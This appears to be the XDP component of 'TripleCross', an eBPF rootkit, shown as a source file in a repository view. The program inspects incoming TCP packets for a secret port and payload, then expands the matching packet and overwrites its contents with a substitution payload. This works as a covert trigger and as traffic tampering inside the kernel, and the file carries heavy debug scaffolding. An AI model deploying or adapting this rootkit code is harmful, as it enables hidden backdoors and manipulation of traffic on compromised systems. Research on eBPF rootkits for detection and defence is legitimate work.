Files
TripleCross/src/ebpf/kit.bpf.c

221 lines
7.1 KiB
C
Raw Normal View History

//Linux system includes
/*#include <unistd.h>
#include <stdbool.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/ip.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <linux/if_ether.h>
#include <linux/pkt_cls.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/udp.h>*/
#include "headervmlinux.h"
//BPF & libbpf dependencies
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_endian.h>
//User-kernel dependencies
#include "../common/constants.h"
//BPF exclusive includes
#include "packet/packet_manager.h"
#include "packet/protocol/tcp_helper.h"
#include "xdp/xdp_helper.h"
#include "utils/strings.h"
//BPF modules to load
#include "include/bpf/sched.h"
#include "include/bpf/fs.h"
char LICENSE[] SEC("license") = "Dual BSD/GPL";
#define ETH_ALEN 6
//Ethernet frame struct
struct eth_hdr {
unsigned char h_dest[ETH_ALEN];
unsigned char h_source[ETH_ALEN];
unsigned short h_proto;
};
SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx){
//bpf_printk("BPF triggered\n");
void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data;
unsigned int payload_size;
struct ethhdr *eth = data;
char *payload;
struct tcphdr *tcp;
struct iphdr *ip;
//Bound checking the packet before operating with it
//Otherwise the bpf verifier will complain
if(ethernet_header_bound_check(eth, data_end)<0){
bpf_printk("Bound check fail A");
return XDP_PASS;
}
ip = data + sizeof(*eth);
if (ip_header_bound_check(ip, data_end)<0){
bpf_printk("B");
return XDP_PASS;
}
if (get_protocol(data) != IPPROTO_TCP){
//bpf_printk("C");
return XDP_PASS;
}
tcp = (void *)ip + sizeof(*ip);
if (tcp_header_bound_check(tcp, data_end)){
bpf_printk("D");
return XDP_PASS;
}
if (get_tcp_dest_port(tcp) != SECRET_PACKET_DEST_PORT){
bpf_printk("E %i\n", bpf_ntohs(tcp->dest));
return XDP_PASS;
}
payload_size = bpf_ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
payload = (void *)tcp + tcp->doff*4;
// We use "size - 1" to account for the final '\0', but depending on the program use
if (payload_size != sizeof(SECRET_PACKET_PAYLOAD)-1) {
bpf_printk("F, PS:%i, P:%i, DE:%i\n", payload_size, payload, data_end);
return XDP_PASS;
}
if (tcp_payload_bound_check(payload, payload_size, data_end)){
bpf_printk("G");
return XDP_PASS;
}
bpf_printk("Received valid TCP packet with payload %s of size %i\n", payload, payload_size);
// Compare each byte, exit if a difference is found.
if(str_n_compare(payload, payload_size, SECRET_PACKET_PAYLOAD, sizeof(SECRET_PACKET_PAYLOAD), payload_size)!=0){
bpf_printk("H");
return XDP_PASS;
}
int data_len_prev = data_end-data;
int data_len_next = -1;
bpf_printk("OLD data_end: %i, payload: %i\n", data_end, payload);
int more_bytes = (int)(sizeof(SUBSTITUTION_NEW_PAYLOAD) - sizeof(SECRET_PACKET_PAYLOAD));
struct expand_return ret = expand_tcp_packet_payload(ctx, eth, ip, tcp, more_bytes);
bpf_printk("Control back to main program with retcode %i after expanding %i bytes\n", ret.code, more_bytes);
if(ret.code == 0){
//We must check bounds again, otherwise the verifier gets angry
ctx = ret.ret_md;
data = (void*)(long)ret.ret_md->data;
data_end = (void*)(long)ret.ret_md->data_end;
eth = ret.eth;
if(ethernet_header_bound_check(eth, data_end)<0){
bpf_printk("Bound check A failed while expanding\n");
return XDP_PASS;
}
ip = ret.ip;
if (ip_header_bound_check(ip, data_end)<0){
bpf_printk("Bound check B failed while expanding\n");
return XDP_PASS;
}
tcp = ret.tcp;
/*if (get_protocol(data_end) != IPPROTO_TCP){
bpf_printk("Bound check C failed while expanding\n");
return XDP_PASS;
}*/
if (tcp_header_bound_check(tcp, data_end)){
bpf_printk("Bound check D failed while expanding\n");
return XDP_PASS;
}
payload_size = bpf_ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
payload = (void *)tcp + tcp->doff*4;
//Quite a trick to avoid the verifier complaining when it's clear we are OK with the payload
//Line 6367 https://lxr.missinglinkelectronics.com/linux/kernel/bpf/verifier.c
if(payload_size < 0|| payload_size>88888){
bpf_printk("Unlikely you are here, but OK\n");
return XDP_PASS;
}
/*if(payload_size -1 < data_end - (void*)payload ){
return XDP_PASS;
}*/
//Note that sizeof(..) is returning strlen +1, but it's ok because
//we do not want to write at payload[6]
if((void*)payload + sizeof(SUBSTITUTION_NEW_PAYLOAD) -1 > data_end){
bpf_printk("Bound check E failed while expanding\n");
return XDP_PASS;
}
if (tcp_payload_bound_check(payload, payload_size, data_end)){
bpf_printk("Bound check F failed while expanding\n");
return XDP_PASS;
}
int pattern_size = (int)sizeof(SUBSTITUTION_NEW_PAYLOAD)-1;
//Let's empty the payload so that the previous one does not appear
//even if it is larger than our new one.
//Caution when doing this on some other place. The verifier is extremely picky on the size of this,
//even if we know that there are empty bytes in futher positions.
//Also if the substitution payload is smaller than the original one, then additional checks must be made
for(int ii = 0; ii<sizeof(SUBSTITUTION_NEW_PAYLOAD) - 1; ii++){
payload[ii] = '\0';
}
//Write our new payload
modify_payload(payload, payload_size, SUBSTITUTION_NEW_PAYLOAD, pattern_size, data, data_end);
bpf_printk("BPF finished with ret %i and payload %s of size %i\n ", ret.code, payload, payload_size);
}else{
bpf_printk("BPF finished with error on expansion\n");
}
data_len_next = data_end-data;
bpf_printk("Previous length: %i, current length: %i\n", data_len_prev, data_len_next);
bpf_printk("NEW data_end: %i, payload: %i\n", data_end, payload);
bpf_printk("And on NEW CTX data_end: %i, payload: %i\n", ctx->data_end, payload);
/*if (tcp_payload_bound_check(payload, payload_size, data_end)){
bpf_printk("G");
return XDP_PASS;
}*/
//payload[1] = 'a';
//strncpy(payload, payload_to_write, sizeof(payload_to_write));
//payload[5] = '\0';
//payload[1] = 'b';
/*if(!payload){
bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void *)payload);
bpf_ringbuf_submit(rb_event, 0);
}else{
//Submit it to user-space for post-processing
bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void*)0);
bpf_ringbuf_submit(rb_event, 0);
}*/
// Same payload as secret one reeceived, pass it with modifications.
return XDP_PASS;
}